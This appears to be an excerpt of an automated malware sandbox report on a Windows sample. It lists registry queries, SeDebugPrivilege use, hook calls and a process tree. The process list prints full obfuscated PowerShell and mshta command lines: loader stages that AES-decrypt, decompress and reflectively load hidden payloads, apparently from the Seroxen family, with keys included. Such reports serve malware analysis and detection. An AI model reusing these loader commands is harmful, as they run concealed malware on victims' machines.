| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\$sxr-mshta.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dllhost.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\dllhost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeAssignPrimaryTokenPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\svchost.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat.exe
"Handler.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function AsZVG($IObBH){ $nGKhQ=[System.Security.Cryptography.Aes]::Create(); $nGKhQ.Mode=[System.Security.Cryptography.CipherMode]::CBC; $nGKhQ.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $nGKhQ.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z1mnkXiSZPv8R2MpZKBD3X42qpFHtc3mYWmVqJ/jqFk='); $nGKhQ.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oe8taAs+mjon3dfZMtxPIg=='); $IIMfj=$nGKhQ.CreateDecryptor(); $return_var=$IIMfj.TransformFinalBlock($IObBH, 0, $IObBH.Length); $IIMfj.Dispose(); $nGKhQ.Dispose(); $return_var;}function nroxc($IObBH){ $lXPBt=New-Object System.IO.MemoryStream(,$IObBH); $jzRog=New-Object System.IO.MemoryStream; $raowK=New-Object System.IO.Compression.GZipStream($lXPBt, [IO.Compression.CompressionMode]::Decompress); $raowK.CopyTo($jzRog); $raowK.Dispose(); $lXPBt.Dispose(); $jzRog.Dispose(); $jzRog.ToArray();}function Dtllp($IObBH,$RqHgm){ $OepAU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$IObBH); $TRlDt=$OepAU.EntryPoint; $TRlDt.Invoke($null, $RqHgm);}$pyjrp=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Release\Handlers\Handler.bat').Split([Environment]::NewLine);foreach ($FdSgb in $pyjrp) { if ($FdSgb.StartsWith('SEROXEN')) { $AdNpy=$FdSgb.Substring(7); break; }}$tMmhK=[string[]]$AdNpy.Split('\');$vypGp=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[0])));$asijd=nroxc (AsZVG ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($tMmhK[1])));Dtllp $asijd (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));Dtllp $vypGp (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{6c1e8ae1-059a-4079-9d9a-8b3ac6a37e20}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{dde15a65-4832-4c21-b873-b8380cde8204}
C:\Windows\$sxr-mshta.exe
C:\Windows\$sxr-mshta.exe "javascript:document['wr'+'it'+'e']('<h'+'tm'+'l>'+'<s'+'cr'+'ip'+'t\x20'+'la'+'ng'+'ua'+'ge'+'=\x22'+'VB'+'Sc'+'ri'+'pt'+'\x22>'+'Se'+'t\x20'+'ob'+'jS'+'he'+'ll'+'\x20='+'\x20C'+'re'+'at'+'eO'+'bj'+'ec'+'t('+'\x22W'+'Sc'+'ri'+'pt'+'.S'+'he'+'ll'+'\x22)'+'\x20:'+'\x20o'+'bj'+'Sh'+'el'+'l.'+'Ru'+'n\x20'+'\x22C:\\Windows\\$sxr-c'+'md'+'.e'+'xe'+'\x20/'+'c %'+'$sxr-SuFaBOaZkphcFfsPxOCG4312:&#<?=%'+'\x22,'+'\x200'+',\x20'+'Tr'+'ue'+'</'+'sc'+'ri'+'pt'+'><'+'/h'+'tm'+'l>');close();"
C:\Windows\$sxr-cmd.exe
"C:\Windows\$sxr-cmd.exe" /c %$sxr-SuFaBOaZkphcFfsPxOCG4312:&#<?=%
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\$sxr-powershell.exe
C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function sXCMM($CkDpq){ $zljWq=[System.Security.Cryptography.Aes]::Create(); $zljWq.Mode=[System.Security.Cryptography.CipherMode]::CBC; $zljWq.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $zljWq.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0='); $zljWq.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg=='); $QOVuV=$zljWq.('rotpyrceDetaerC'[-1..-15] -join '')(); $XqeJd=$QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CkDpq, 0, $CkDpq.Length); $QOVuV.Dispose(); $zljWq.Dispose(); $XqeJd;}function pIPqe($CkDpq){ $RVxvX=New-Object System.IO.MemoryStream(,$CkDpq); $MPpXr=New-Object System.IO.MemoryStream; $tIDwQ=New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::Decompress); $tIDwQ.CopyTo($MPpXr); $tIDwQ.Dispose(); $RVxvX.Dispose(); $MPpXr.Dispose(); $MPpXr.ToArray();}function OVJQF($CkDpq,$HUtBG){ $QhIbf=[System.Reflection.Assembly]::Load([byte[]]$CkDpq); $edhhl=$QhIbf.EntryPoint; $edhhl.Invoke($null, $HUtBG);}$zljWq1 = New-Object System.Security.Cryptography.AesManaged;$zljWq1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$dKTJk = $zljWq1.('rotpyrceDetaerC'[-1..-15] -join '')();$RVcQq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Nh0O9Tq4WhjVRVv6TIlxng==');$RVcQq = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq, 0, $RVcQq.Length);$RVcQq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq);$OATYX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 
'')('DphlnsvScNekfgsLVTd7mzDTpuPYV2uzlVKF5APiXTs=');$OATYX = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OATYX, 0, $OATYX.Length);$OATYX = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($OATYX);$pxqaL = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VOurjNNOAf3rWCyDVTfXEg==');$pxqaL = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($pxqaL, 0, $pxqaL.Length);$pxqaL = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($pxqaL);$sZmZm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bwCwxwfgvgLvd83CID2tuY2PW5n2F6O9HvfP0OXG8B2If0HCFuJvOfQkZnJJHGqr4W77keqJnrHoUOLsxavQfVPJgnZi5dCVwfqInTPzI5sB/ovu8wzR06kYDbDCFSZIUmhZnetqX07nQ3nN2G8dx8hDcvN8OEtke141bP5XbYA7V7pEdDf3FgqTYuWoMaz+k56vPVibKCooeH7zQ3DK29EBBQ9NAhbbXDFzReMv7zlMDbkoqlsAAEqbrXnoCu5yb4MKtcf+DHcvr/3wdC9bIKzrVR+Z59S5tuu5Ot2efgPcTwmjF9AfsSO6Z0XGodft9zU2RXKHKxayYhES9v/HDue0kdAd1egn28t4LVgg/sk/Lq23+HYJ+gLzHX2a8njudWREXxqxpxGUV/yJzhNVaEtLryDlFlbG61xiz9rtJRc=');$sZmZm = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($sZmZm, 0, $sZmZm.Length);$sZmZm = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($sZmZm);$hunvf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rq5zXkyy0NL/id4X1CFNpQ==');$hunvf = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hunvf, 0, $hunvf.Length);$hunvf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($hunvf);$uooKb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wR0HI5liF2OH5JSIeYrcUA==');$uooKb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($uooKb, 0, $uooKb.Length);$uooKb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($uooKb);$HssPO = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wr1hAjwP3vd25eg2X2PyLA==');$HssPO = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HssPO, 0, $HssPO.Length);$HssPO = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] 
-join '')($HssPO);$coosp = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('W+228sMz/VVvzW5Wi2DfeQ==');$coosp = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($coosp, 0, $coosp.Length);$coosp = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($coosp);$cqFrb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LnPkErAMqZ8UA2dOM3NRUw==');$cqFrb = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cqFrb, 0, $cqFrb.Length);$cqFrb = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cqFrb);$RVcQq0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jzKuA/Szphx4DaASO5/17A==');$RVcQq0 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq0, 0, $RVcQq0.Length);$RVcQq0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq0);$RVcQq1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KBGLdnELndsDRqQwc9+ZdQ==');$RVcQq1 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq1, 0, $RVcQq1.Length);$RVcQq1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq1);$RVcQq2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('h0utQU1KufGAbeZac8uGpg==');$RVcQq2 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq2, 0, $RVcQq2.Length);$RVcQq2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq2);$RVcQq3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NHOzA0blhk4FfOP1QwdrHA==');$RVcQq3 = $dKTJk.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($RVcQq3, 0, $RVcQq3.Length);$RVcQq3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($RVcQq3);$dKTJk.Dispose();$zljWq1.Dispose();if (@(get-process -ea silentlycontinue $RVcQq3).count -gt 1) {exit};$wqkcL = [Microsoft.Win32.Registry]::$coosp.$HssPO($RVcQq).$uooKb($OATYX);$khgFI=[string[]]$wqkcL.Split('\');$IeVcP=pIPqe(sXCMM([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 
'')($khgFI[1])));OVJQF $IeVcP (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$dgCqa = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($khgFI[0]);$zljWq = New-Object System.Security.Cryptography.AesManaged;$zljWq.Mode = [System.Security.Cryptography.CipherMode]::CBC;$zljWq.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$zljWq.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2j38zfvlS2eG10+5Bn8oKr9nVYk0RQST+LfAJHy33f0=');$zljWq.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dQc6M4a1U8SkygTmibGyDg==');$QOVuV = $zljWq.('rotpyrceDetaerC'[-1..-15] -join '')();$dgCqa = $QOVuV.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($dgCqa, 0, $dgCqa.Length);$QOVuV.Dispose();$zljWq.Dispose();$RVxvX = New-Object System.IO.MemoryStream(, $dgCqa);$MPpXr = New-Object System.IO.MemoryStream;$tIDwQ = New-Object System.IO.Compression.GZipStream($RVxvX, [IO.Compression.CompressionMode]::$RVcQq1);$tIDwQ.$cqFrb($MPpXr);$tIDwQ.Dispose();$RVxvX.Dispose();$MPpXr.Dispose();$dgCqa = $MPpXr.ToArray();$tbTTb = $sZmZm | IEX;$QhIbf = $tbTTb::$RVcQq2($dgCqa);$edhhl = $QhIbf.EntryPoint;$edhhl.$RVcQq0($null, (, [string[]] ($pxqaL)))
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{af284ebf-c17d-416a-89fe-4d4c69dab533}
C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{e6d23945-1aac-40fc-8343-6399bdcfaaef}
C:\Windows\$sxr-powershell.exe
